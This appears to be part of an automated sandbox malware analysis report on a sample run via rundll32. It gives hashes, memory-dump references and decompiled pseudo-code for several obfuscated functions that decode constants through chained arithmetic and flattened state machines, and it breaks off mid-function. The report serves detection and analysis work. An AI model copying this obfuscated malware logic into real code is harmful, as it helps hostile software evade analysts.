                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4t$=r;$_O\$mWv$N$Zh
                                                                                                                    • API String ID: 0-2036408213
                                                                                                                    • Opcode ID: 6f72cc1009d87798d44c9622819da146cb5a6103576972cb6a086af905dc4f74
                                                                                                                    • Instruction ID: b7afd02c22d6f1771e525c897fba52f99ab8262f3937c1743b44f183d8687bd7
                                                                                                                    • Opcode Fuzzy Hash: 6f72cc1009d87798d44c9622819da146cb5a6103576972cb6a086af905dc4f74
                                                                                                                    • Instruction Fuzzy Hash: 1FC142715083819FC319CF25C48995BBFE1FBC9358F508A0EF9969A260D3B4DA49CF86
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0034D389 Relevance: 7.7, Strings: 6, Instructions: 243COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 83%
                                                                                                                    			E0034D389(void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				void* __ecx;
				char _t245;
				void* _t263;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				void* _t280;
				void* _t306;
				intOrPtr _t307;
				char _t308;
				signed int* _t311;

				_push(_a28);
				_t306 = __edx;
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(__edx);
				_t245 = E003420B9(0);
				_v72 = _t245;
				_t311 =  &(( &_v168)[9]);
				_v84 = 0xd8cd3;
				_t307 = _t245;
				_v84 = _v84 ^ 0x2f0b54cb;
				_v84 = _v84 ^ 0x2f06dc18;
				_t280 = 0xd3d1227;
				_v116 = 0xdf2f98;
				_v116 = _v116 >> 4;
				_v116 = _v116 | 0xd629951a;
				_v116 = _v116 ^ 0xd62df7db;
				_v120 = 0x9d2532;
				_v120 = _v120 | 0x60368432;
				_v120 = _v120 << 1;
				_v120 = _v120 ^ 0xc1706bd2;
				_v104 = 0x3ed100;
				_v104 = _v104 >> 0xd;
				_v104 = _v104 << 0x10;
				_v104 = _v104 ^ 0x01fb42fe;
				_v132 = 0xac3ff1;
				_v132 = _v132 << 1;
				_v132 = _v132 ^ 0x8b709814;
				_v132 = _v132 + 0xffff5c55;
				_v132 = _v132 ^ 0x8a223f6b;
				_v164 = 0xc1955c;
				_v164 = _v164 + 0xe851;
				_v164 = _v164 >> 5;
				_t272 = 0x7c;
				_v164 = _v164 / _t272;
				_v164 = _v164 ^ 0x000d6983;
				_v76 = 0x371de3;
				_v76 = _v76 >> 1;
				_v76 = _v76 ^ 0x00157680;
				_v156 = 0xc7985;
				_v156 = _v156 + 0xffff997a;
				_v156 = _v156 + 0x5493;
				_v156 = _v156 ^ 0xa8ab967c;
				_v156 = _v156 ^ 0xa8a621f4;
				_v92 = 0xd6ada;
				_v92 = _v92 + 0xf102;
				_v92 = _v92 ^ 0x00049005;
				_v152 = 0xbb1df2;
				_t273 = 0x71;
				_v152 = _v152 * 0x37;
				_v152 = _v152 << 2;
				_v152 = _v152 + 0x7572;
				_v152 = _v152 ^ 0xa0c338c0;
				_v108 = 0xfb68a6;
				_v108 = _v108 / _t273;
				_v108 = _v108 * 0x38;
				_v108 = _v108 ^ 0x00745d8a;
				_v160 = 0x9cfb41;
				_v160 = _v160 >> 0xd;
				_v160 = _v160 + 0xffff2425;
				_v160 = _v160 | 0xc56bf860;
				_v160 = _v160 ^ 0xffffb927;
				_v100 = 0xcc3697;
				_v100 = _v100 << 9;
				_t274 = 0x3d;
				_v100 = _v100 / _t274;
				_v100 = _v100 ^ 0x027f162e;
				_v124 = 0x5e8102;
				_v124 = _v124 << 1;
				_v124 = _v124 >> 4;
				_v124 = _v124 ^ 0x000928e5;
				_v96 = 0x9a5083;
				_v96 = _v96 + 0xffff88fb;
				_v96 = _v96 | 0x7e2ee754;
				_v96 = _v96 ^ 0x7eb15945;
				_v168 = 0x417f4c;
				_v168 = _v168 + 0x30ef;
				_v168 = _v168 + 0xffff0fcf;
				_v168 = _v168 | 0x766f950c;
				_v168 = _v168 ^ 0x7667a907;
				_v148 = 0xeb5ea2;
				_v148 = _v148 >> 1;
				_v148 = _v148 | 0xdbfe62fd;
				_v148 = _v148 ^ 0xdbf81284;
				_v88 = 0xc982d2;
				_v88 = _v88 | 0xbf502ba4;
				_v88 = _v88 ^ 0xbfda3d08;
				_v80 = 0x51a7e7;
				_v80 = _v80 | 0xcf4b4eb1;
				_v80 = _v80 ^ 0xcf5d8599;
				_v140 = 0x112038;
				_v140 = _v140 >> 0xc;
				_v140 = _v140 | 0x79e3f6d0;
				_v140 = _v140 >> 0xc;
				_v140 = _v140 ^ 0x000d6368;
				_v144 = 0x3c4be1;
				_v144 = _v144 << 1;
				_t275 = 0x51;
				_v144 = _v144 / _t275;
				_t276 = 0x44;
				_v144 = _v144 / _t276;
				_v144 = _v144 ^ 0x0006a926;
				_v112 = 0xebe610;
				_t277 = 6;
				_v112 = _v112 / _t277;
				_v112 = _v112 ^ 0x8e2a0175;
				_v112 = _v112 ^ 0x8e0783c0;
				_v128 = 0x507b99;
				_v128 = _v128 ^ 0xb6dd86a4;
				_v128 = _v128 + 0xffff6e9b;
				_v128 = _v128 * 0x6f;
				_v128 = _v128 ^ 0x275b8ca8;
				_v136 = 0x1b49e9;
				_v136 = _v136 * 0x22;
				_v136 = _v136 ^ 0x6bc19a50;
				_v136 = _v136 ^ 0xda04c504;
				_v136 = _v136 ^ 0xb25c1cc6;
				do {
					while(_t280 != 0x9b6c7ef) {
						if(_t280 == 0xd3d1227) {
							_t280 = 0x9b6c7ef;
							continue;
						} else {
							if(_t280 == 0xd8aa277) {
								E00349008(_v72, _v128, _v136);
							} else {
								_t317 = _t280 - 0xdb35d55;
								if(_t280 != 0xdb35d55) {
									goto L10;
								} else {
									_push(_v164);
									_push(_v132);
									_t308 = 0x44;
									E00334B61( &_v68, _t308);
									_push(_v92);
									_v68 = _t308;
									_push(_v156);
									_t284 = _v76;
									_v60 = E0034DCF7(_v76, 0x33173c, _t317);
									_t307 = E0034DE10( &_v68, _v152, _t306, _v116 | _v84, _v76, _a12, _v108, 0, _a28, _v160, _v72, _v100, _v124, _v96, _t284, _t284, _v168, _v148, _t284, _v88, _v80, _v140);
									E0033A8B0(_v144, _v60, _v112);
									_t311 =  &(_t311[0x19]);
									_t280 = 0xd8aa277;
									continue;
								}
							}
						}
						L13:
						return _t307;
					}
					_t263 = E00334241(_t280, _v120,  &_v72, _a28, _v104);
					_t311 =  &(_t311[3]);
					__eflags = _t263;
					if(_t263 == 0) {
						_t280 = 0xcb447d9;
						goto L10;
					} else {
						_t280 = 0xdb35d55;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t280 - 0xcb447d9;
				} while (_t280 != 0xcb447d9);
				goto L13;
			}












































                                                                                                                    0x0034d393
                                                                                                                    0x0034d39c
                                                                                                                    0x0034d39e
                                                                                                                    0x0034d3a5
                                                                                                                    0x0034d3a6
                                                                                                                    0x0034d3ad
                                                                                                                    0x0034d3b4
                                                                                                                    0x0034d3b5
                                                                                                                    0x0034d3bc
                                                                                                                    0x0034d3be
                                                                                                                    0x0034d3c3
                                                                                                                    0x0034d3ca
                                                                                                                    0x0034d3cd
                                                                                                                    0x0034d3d5
                                                                                                                    0x0034d3d7
                                                                                                                    0x0034d3e1
                                                                                                                    0x0034d3e9
                                                                                                                    0x0034d3ee
                                                                                                                    0x0034d3f6
                                                                                                                    0x0034d3fb
                                                                                                                    0x0034d403
                                                                                                                    0x0034d40b
                                                                                                                    0x0034d413
                                                                                                                    0x0034d41b
                                                                                                                    0x0034d41f
                                                                                                                    0x0034d427
                                                                                                                    0x0034d42f
                                                                                                                    0x0034d434
                                                                                                                    0x0034d439
                                                                                                                    0x0034d441
                                                                                                                    0x0034d449
                                                                                                                    0x0034d44d
                                                                                                                    0x0034d455
                                                                                                                    0x0034d45d
                                                                                                                    0x0034d465
                                                                                                                    0x0034d46d
                                                                                                                    0x0034d475
                                                                                                                    0x0034d480
                                                                                                                    0x0034d485
                                                                                                                    0x0034d48b
                                                                                                                    0x0034d493
                                                                                                                    0x0034d49b
                                                                                                                    0x0034d49f
                                                                                                                    0x0034d4a7
                                                                                                                    0x0034d4af
                                                                                                                    0x0034d4b7
                                                                                                                    0x0034d4bf
                                                                                                                    0x0034d4c7
                                                                                                                    0x0034d4cf
                                                                                                                    0x0034d4d7
                                                                                                                    0x0034d4df
                                                                                                                    0x0034d4e7
                                                                                                                    0x0034d4f4
                                                                                                                    0x0034d4f5
                                                                                                                    0x0034d4f9
                                                                                                                    0x0034d4fe
                                                                                                                    0x0034d506
                                                                                                                    0x0034d50e
                                                                                                                    0x0034d51c
                                                                                                                    0x0034d525
                                                                                                                    0x0034d529
                                                                                                                    0x0034d531
                                                                                                                    0x0034d539
                                                                                                                    0x0034d53e
                                                                                                                    0x0034d546
                                                                                                                    0x0034d54e
                                                                                                                    0x0034d558
                                                                                                                    0x0034d565
                                                                                                                    0x0034d570
                                                                                                                    0x0034d575
                                                                                                                    0x0034d57b
                                                                                                                    0x0034d583
                                                                                                                    0x0034d58b
                                                                                                                    0x0034d58f
                                                                                                                    0x0034d594
                                                                                                                    0x0034d59c
                                                                                                                    0x0034d5a4
                                                                                                                    0x0034d5ac
                                                                                                                    0x0034d5b4
                                                                                                                    0x0034d5bc
                                                                                                                    0x0034d5c4
                                                                                                                    0x0034d5cc
                                                                                                                    0x0034d5d4
                                                                                                                    0x0034d5dc
                                                                                                                    0x0034d5e4
                                                                                                                    0x0034d5ec
                                                                                                                    0x0034d5f0
                                                                                                                    0x0034d5f8
                                                                                                                    0x0034d600
                                                                                                                    0x0034d608
                                                                                                                    0x0034d610
                                                                                                                    0x0034d618
                                                                                                                    0x0034d620
                                                                                                                    0x0034d628
                                                                                                                    0x0034d630
                                                                                                                    0x0034d638
                                                                                                                    0x0034d63d
                                                                                                                    0x0034d645
                                                                                                                    0x0034d64a
                                                                                                                    0x0034d652
                                                                                                                    0x0034d65a
                                                                                                                    0x0034d662
                                                                                                                    0x0034d667
                                                                                                                    0x0034d671
                                                                                                                    0x0034d676
                                                                                                                    0x0034d67c
                                                                                                                    0x0034d684
                                                                                                                    0x0034d690
                                                                                                                    0x0034d698
                                                                                                                    0x0034d69c
                                                                                                                    0x0034d6a4
                                                                                                                    0x0034d6ac
                                                                                                                    0x0034d6b4
                                                                                                                    0x0034d6bc
                                                                                                                    0x0034d6c9
                                                                                                                    0x0034d6cd
                                                                                                                    0x0034d6d5
                                                                                                                    0x0034d6e2
                                                                                                                    0x0034d6e6
                                                                                                                    0x0034d6ee
                                                                                                                    0x0034d6f6
                                                                                                                    0x0034d6fe
                                                                                                                    0x0034d6fe
                                                                                                                    0x0034d70c
                                                                                                                    0x0034d7ec
                                                                                                                    0x00000000
                                                                                                                    0x0034d712
                                                                                                                    0x0034d718
                                                                                                                    0x0034d839
                                                                                                                    0x0034d71e
                                                                                                                    0x0034d71e
                                                                                                                    0x0034d720
                                                                                                                    0x00000000
                                                                                                                    0x0034d726
                                                                                                                    0x0034d726
                                                                                                                    0x0034d72e
                                                                                                                    0x0034d734
                                                                                                                    0x0034d737
                                                                                                                    0x0034d73c
                                                                                                                    0x0034d745
                                                                                                                    0x0034d74c
                                                                                                                    0x0034d750
                                                                                                                    0x0034d75c
                                                                                                                    0x0034d7d4
                                                                                                                    0x0034d7da
                                                                                                                    0x0034d7df
                                                                                                                    0x0034d7e2
                                                                                                                    0x00000000
                                                                                                                    0x0034d7e2
                                                                                                                    0x0034d720
                                                                                                                    0x0034d718
                                                                                                                    0x0034d840
                                                                                                                    0x0034d84b
                                                                                                                    0x0034d84b
                                                                                                                    0x0034d807
                                                                                                                    0x0034d80c
                                                                                                                    0x0034d80f
                                                                                                                    0x0034d811
                                                                                                                    0x0034d81a
                                                                                                                    0x00000000
                                                                                                                    0x0034d813
                                                                                                                    0x0034d813
                                                                                                                    0x00000000
                                                                                                                    0x0034d813
                                                                                                                    0x00000000
                                                                                                                    0x0034d81f
                                                                                                                    0x0034d81f
                                                                                                                    0x0034d81f
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: T.~$hc$ru$($0$K<
                                                                                                                    • API String ID: 0-2343433060
                                                                                                                    • Opcode ID: a6063a9e6399018d427db2df58aeaaa08f51a843671459449f42c599cbbbb895
                                                                                                                    • Instruction ID: bd0e21efccefc3883531dae450b1e1f4737d36ea360eaa55016574c61aa171cf
                                                                                                                    • Opcode Fuzzy Hash: a6063a9e6399018d427db2df58aeaaa08f51a843671459449f42c599cbbbb895
                                                                                                                    • Instruction Fuzzy Hash: BFC132725083809FD769CF21C986A5BFBE1FBD5704F104A1DF29A9A260C7B69908CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00333E3F Relevance: 7.7, Strings: 6, Instructions: 217COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 97%
                                                                                                                    			E00333E3F() {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t213;
				signed int _t214;
				void* _t216;
				signed int _t222;
				intOrPtr _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				void* _t230;
				void* _t236;
				void* _t257;
				signed int* _t261;

				_t261 =  &_v100;
				_v8 = 0xc74bd8;
				_v4 = 0;
				_v72 = 0x3d4417;
				_v72 = _v72 << 8;
				_v72 = _v72 + 0xffff33fd;
				_v72 = _v72 ^ 0xbd434afc;
				_v32 = 0xa9ac19;
				_v32 = _v32 + 0x4aca;
				_v32 = _v32 ^ 0x00a9f6e1;
				_v40 = 0x1f6a8;
				_v12 = 0;
				_v40 = _v40 * 0x6f;
				_t257 = 0xf52a3f4;
				_v40 = _v40 ^ 0x00d19880;
				_v44 = 0x168b17;
				_v44 = _v44 + 0x13a5;
				_v44 = _v44 ^ 0x001ee95f;
				_v48 = 0xfac2ed;
				_v48 = _v48 + 0xffff2a35;
				_v48 = _v48 ^ 0x00fbd9f9;
				_v92 = 0xc00c53;
				_v92 = _v92 + 0xffff1aa9;
				_v92 = _v92 + 0xf2d7;
				_t225 = 0x68;
				_v92 = _v92 / _t225;
				_v92 = _v92 ^ 0x0000565c;
				_v68 = 0xf2ac97;
				_v68 = _v68 ^ 0x99fc0549;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x000a8804;
				_v24 = 0xf89d13;
				_t226 = 0x49;
				_v24 = _v24 / _t226;
				_v24 = _v24 ^ 0x000ed122;
				_v96 = 0x9976f7;
				_v96 = _v96 >> 0xe;
				_v96 = _v96 ^ 0xdd1af6ea;
				_v96 = _v96 ^ 0x684d855d;
				_v96 = _v96 ^ 0xb5551d4c;
				_v28 = 0x12a2d6;
				_t227 = 0xe;
				_v28 = _v28 * 0x29;
				_v28 = _v28 ^ 0x02ffade5;
				_v100 = 0x1d8880;
				_v100 = _v100 + 0x8a1e;
				_v100 = _v100 * 0x7c;
				_v100 = _v100 + 0xffff421a;
				_v100 = _v100 ^ 0x0e9f1559;
				_v36 = 0x784079;
				_v36 = _v36 / _t227;
				_v36 = _v36 ^ 0x0007caf6;
				_v60 = 0xd037f8;
				_v60 = _v60 >> 0xf;
				_v60 = _v60 + 0xfffff3b4;
				_v60 = _v60 ^ 0xfff3df4e;
				_v64 = 0x95f516;
				_v64 = _v64 + 0xffffc55a;
				_v64 = _v64 | 0x523f0ae6;
				_v64 = _v64 ^ 0x52b19695;
				_v84 = 0x271827;
				_v84 = _v84 + 0xffff7017;
				_v84 = _v84 + 0x1e15;
				_v84 = _v84 ^ 0xa1c53b6b;
				_v84 = _v84 ^ 0xa1e64a9e;
				_v52 = 0x3d5883;
				_v52 = _v52 >> 5;
				_v52 = _v52 << 3;
				_v52 = _v52 ^ 0x000b56f4;
				_v56 = 0xd5acf2;
				_v56 = _v56 ^ 0x15c9a5cd;
				_v56 = _v56 << 3;
				_v56 = _v56 ^ 0xa8e6808a;
				_v88 = 0xcc2476;
				_v88 = _v88 + 0x4ceb;
				_v88 = _v88 ^ 0xdbab884b;
				_t228 = 0x4f;
				_v88 = _v88 / _t228;
				_v88 = _v88 ^ 0x02ce2d39;
				_v20 = 0x9b21e;
				_v20 = _v20 + 0x218b;
				_v20 = _v20 ^ 0x00037084;
				_v76 = 0xcba48;
				_t229 = 0x5a;
				_t222 = _v12;
				_v76 = _v76 * 0x7b;
				_v76 = _v76 + 0x3acc;
				_v76 = _v76 << 0x10;
				_v76 = _v76 ^ 0xbb6cb0a9;
				_v80 = 0x9c886e;
				_v80 = _v80 ^ 0x88757b42;
				_t230 = 0x5c;
				_v80 = _v80 / _t229;
				_v80 = _v80 << 0xe;
				_v80 = _v80 ^ 0x5c6ae118;
				while(1) {
					L1:
					_t213 = 0xa360d2e;
					do {
						while(_t257 != _t213) {
							if(_t257 == 0xb87cfc3) {
								_t223 =  *0x353e10; // 0x0
								_t224 = _t223 + 0x1c;
								while(1) {
									__eflags =  *_t224 - _t230;
									if(__eflags == 0) {
										break;
									}
									_t224 = _t224 + 2;
									__eflags = _t224;
								}
								_t222 = _t224 + 2;
								_t257 = 0xc7301de;
								goto L1;
							} else {
								if(_t257 == 0xc7301de) {
									_push(_v48);
									_push(_v44);
									_t216 = E0034DCF7(_v40, 0x331080, __eflags);
									_pop(_t236);
									__eflags = E0033AAD6(_t216, _v92, _v68, _v72, _t236, _t236, _v24, _v96, _v28, _t236,  &_v16, _v100, _t236, _v32, _t236, _v36);
									_t257 =  ==  ? 0xa360d2e : 0x57f878b;
									E0033A8B0(_v60, _t216, _v64);
									_t261 =  &(_t261[0xf]);
									L14:
									_t213 = 0xa360d2e;
									_t230 = 0x5c;
									goto L15;
								} else {
									if(_t257 == 0xdd28c3f) {
										E00331FD1(_v20, _v76, _v80, _v16);
									} else {
										if(_t257 != 0xf52a3f4) {
											goto L15;
										} else {
											_t257 = 0xb87cfc3;
											continue;
										}
									}
								}
							}
							L18:
							return _v12;
						}
						_t214 = E00331F53(_v16, _v84, _v52, _t222, _v56, _v88);
						_t261 =  &(_t261[4]);
						__eflags = _t214;
						_t257 = 0xdd28c3f;
						_t191 = _t214 == 0;
						__eflags = _t191;
						_v12 = 0 | _t191;
						goto L14;
						L15:
						__eflags = _t257 - 0x57f878b;
					} while (__eflags != 0);
					goto L18;
				}
			}











































                                                                                                                    0x00333e3f
                                                                                                                    0x00333e42
                                                                                                                    0x00333e4c
                                                                                                                    0x00333e52
                                                                                                                    0x00333e5a
                                                                                                                    0x00333e5f
                                                                                                                    0x00333e67
                                                                                                                    0x00333e6f
                                                                                                                    0x00333e77
                                                                                                                    0x00333e7f
                                                                                                                    0x00333e87
                                                                                                                    0x00333e8f
                                                                                                                    0x00333e9c
                                                                                                                    0x00333ea0
                                                                                                                    0x00333ea5
                                                                                                                    0x00333ead
                                                                                                                    0x00333eb5
                                                                                                                    0x00333ebd
                                                                                                                    0x00333ec5
                                                                                                                    0x00333ecd
                                                                                                                    0x00333ed5
                                                                                                                    0x00333edd
                                                                                                                    0x00333ee5
                                                                                                                    0x00333eed
                                                                                                                    0x00333efb
                                                                                                                    0x00333f00
                                                                                                                    0x00333f06
                                                                                                                    0x00333f0e
                                                                                                                    0x00333f16
                                                                                                                    0x00333f1e
                                                                                                                    0x00333f23
                                                                                                                    0x00333f2b
                                                                                                                    0x00333f37
                                                                                                                    0x00333f3c
                                                                                                                    0x00333f42
                                                                                                                    0x00333f4a
                                                                                                                    0x00333f52
                                                                                                                    0x00333f57
                                                                                                                    0x00333f5f
                                                                                                                    0x00333f67
                                                                                                                    0x00333f6f
                                                                                                                    0x00333f7c
                                                                                                                    0x00333f7d
                                                                                                                    0x00333f81
                                                                                                                    0x00333f89
                                                                                                                    0x00333f91
                                                                                                                    0x00333f9e
                                                                                                                    0x00333fa2
                                                                                                                    0x00333faa
                                                                                                                    0x00333fb2
                                                                                                                    0x00333fc0
                                                                                                                    0x00333fc4
                                                                                                                    0x00333fcc
                                                                                                                    0x00333fd4
                                                                                                                    0x00333fd9
                                                                                                                    0x00333fe1
                                                                                                                    0x00333fe9
                                                                                                                    0x00333ff1
                                                                                                                    0x00333ff9
                                                                                                                    0x00334001
                                                                                                                    0x00334009
                                                                                                                    0x00334011
                                                                                                                    0x00334019
                                                                                                                    0x00334023
                                                                                                                    0x00334030
                                                                                                                    0x00334038
                                                                                                                    0x00334040
                                                                                                                    0x00334045
                                                                                                                    0x0033404a
                                                                                                                    0x00334052
                                                                                                                    0x0033405a
                                                                                                                    0x00334062
                                                                                                                    0x00334067
                                                                                                                    0x0033406f
                                                                                                                    0x00334077
                                                                                                                    0x0033407f
                                                                                                                    0x0033408d
                                                                                                                    0x00334092
                                                                                                                    0x00334098
                                                                                                                    0x003340a0
                                                                                                                    0x003340a8
                                                                                                                    0x003340b0
                                                                                                                    0x003340b8
                                                                                                                    0x003340c5
                                                                                                                    0x003340c6
                                                                                                                    0x003340cc
                                                                                                                    0x003340d0
                                                                                                                    0x003340d8
                                                                                                                    0x003340dd
                                                                                                                    0x003340e5
                                                                                                                    0x003340ed
                                                                                                                    0x003340fb
                                                                                                                    0x003340fc
                                                                                                                    0x00334100
                                                                                                                    0x00334105
                                                                                                                    0x0033410d
                                                                                                                    0x0033410d
                                                                                                                    0x0033410d
                                                                                                                    0x00334112
                                                                                                                    0x00334112
                                                                                                                    0x0033411c
                                                                                                                    0x003341bb
                                                                                                                    0x003341c1
                                                                                                                    0x003341c9
                                                                                                                    0x003341c9
                                                                                                                    0x003341cc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003341c6
                                                                                                                    0x003341c6
                                                                                                                    0x003341c6
                                                                                                                    0x003341ce
                                                                                                                    0x003341d1
                                                                                                                    0x00000000
                                                                                                                    0x00334122
                                                                                                                    0x00334128
                                                                                                                    0x00334146
                                                                                                                    0x0033414f
                                                                                                                    0x00334157
                                                                                                                    0x0033415d
                                                                                                                    0x003341a0
                                                                                                                    0x003341ae
                                                                                                                    0x003341b1
                                                                                                                    0x003341b6
                                                                                                                    0x00334208
                                                                                                                    0x0033420a
                                                                                                                    0x0033420f
                                                                                                                    0x00000000
                                                                                                                    0x0033412a
                                                                                                                    0x00334130
                                                                                                                    0x0033422e
                                                                                                                    0x00334136
                                                                                                                    0x0033413c
                                                                                                                    0x00000000
                                                                                                                    0x00334142
                                                                                                                    0x00334142
                                                                                                                    0x00000000
                                                                                                                    0x00334142
                                                                                                                    0x0033413c
                                                                                                                    0x00334130
                                                                                                                    0x00334128
                                                                                                                    0x00334235
                                                                                                                    0x00334240
                                                                                                                    0x00334240
                                                                                                                    0x003341f0
                                                                                                                    0x003341f7
                                                                                                                    0x003341fa
                                                                                                                    0x003341fc
                                                                                                                    0x00334201
                                                                                                                    0x00334201
                                                                                                                    0x00334204
                                                                                                                    0x00000000
                                                                                                                    0x00334210
                                                                                                                    0x00334210
                                                                                                                    0x00334210
                                                                                                                    0x00000000
                                                                                                                    0x0033421c

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .6$.6$.6$y@x$?R$L
                                                                                                                    • API String ID: 0-3177096336
                                                                                                                    • Opcode ID: 9b0c434da2b6a5fe25960c182e705057e1f610ffc440a1a8ebd4fb943a089523
                                                                                                                    • Instruction ID: 1caa20f1320ac15ffec32b3cffd6deaa0078403b57a94f4956ee3b1da6c8295a
                                                                                                                    • Opcode Fuzzy Hash: 9b0c434da2b6a5fe25960c182e705057e1f610ffc440a1a8ebd4fb943a089523
                                                                                                                    • Instruction Fuzzy Hash: 1BA140B25083409FC798CF26D88A41BBBF1FBD4758F108A1DF1958A260D3B58949CF47
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0033B74D Relevance: 7.7, Strings: 6, Instructions: 217COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E0033B74D(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t231;
				intOrPtr _t232;
				intOrPtr _t233;
				void* _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				void* _t266;
				void* _t267;
				signed int* _t270;
				signed int* _t271;

				_t270 =  &_v104;
				_v4 = _v4 & 0x00000000;
				_v12 = 0x6c2b32;
				_v8 = 0x58b11;
				_v64 = 0x37f8ee;
				_v64 = _v64 + 0xffff6702;
				_v64 = _v64 ^ 0xad40df3f;
				_v64 = _v64 ^ 0xad79282c;
				_v100 = 0x6d524;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 + 0x2921;
				_v100 = _v100 >> 6;
				_v100 = _v100 ^ 0x00050ee9;
				_v28 = 0x9e9a;
				_t266 = __edx;
				_t237 = __ecx;
				_t267 = 0x52ffaa2;
				_t239 = 0xb;
				_v28 = _v28 / _t239;
				_v28 = _v28 ^ 0x00028e70;
				_v32 = 0x2476b5;
				_t240 = 0x6f;
				_v32 = _v32 / _t240;
				_v32 = _v32 ^ 0x0008b44d;
				_v60 = 0x9e7d2d;
				_v60 = _v60 >> 0xc;
				_v60 = _v60 << 0xe;
				_v60 = _v60 ^ 0x02752993;
				_v24 = 0xe09194;
				_t241 = 0x44;
				_v24 = _v24 / _t241;
				_v24 = _v24 ^ 0x0009703f;
				_v96 = 0x854eb1;
				_v96 = _v96 + 0xc1c6;
				_v96 = _v96 * 0x1a;
				_v96 = _v96 | 0x594c04b7;
				_v96 = _v96 ^ 0x5dd9e9b5;
				_v20 = 0x86d30b;
				_v20 = _v20 | 0xe45dff90;
				_v20 = _v20 ^ 0xe4d4624e;
				_v92 = 0x8501b9;
				_v92 = _v92 >> 6;
				_v92 = _v92 * 0x2f;
				_v92 = _v92 + 0xe9ed;
				_v92 = _v92 ^ 0x0060653e;
				_v52 = 0xaa921f;
				_v52 = _v52 ^ 0x3dfd2146;
				_v52 = _v52 >> 1;
				_v52 = _v52 ^ 0x1ea8ab64;
				_v56 = 0x2765e6;
				_v56 = _v56 ^ 0x5c8ea534;
				_v56 = _v56 | 0xccee86e2;
				_v56 = _v56 ^ 0xdcebf872;
				_v88 = 0x89b797;
				_v88 = _v88 + 0x84ba;
				_v88 = _v88 + 0xc14;
				_v88 = _v88 | 0xbe23ba3f;
				_v88 = _v88 ^ 0xbea6e118;
				_v48 = 0x866a1d;
				_v48 = _v48 >> 9;
				_v48 = _v48 * 0x16;
				_v48 = _v48 ^ 0x0007ec78;
				_v16 = 0x7d5d8a;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x000578c4;
				_v68 = 0x2c77b1;
				_v68 = _v68 | 0xad369f51;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0xdff48475;
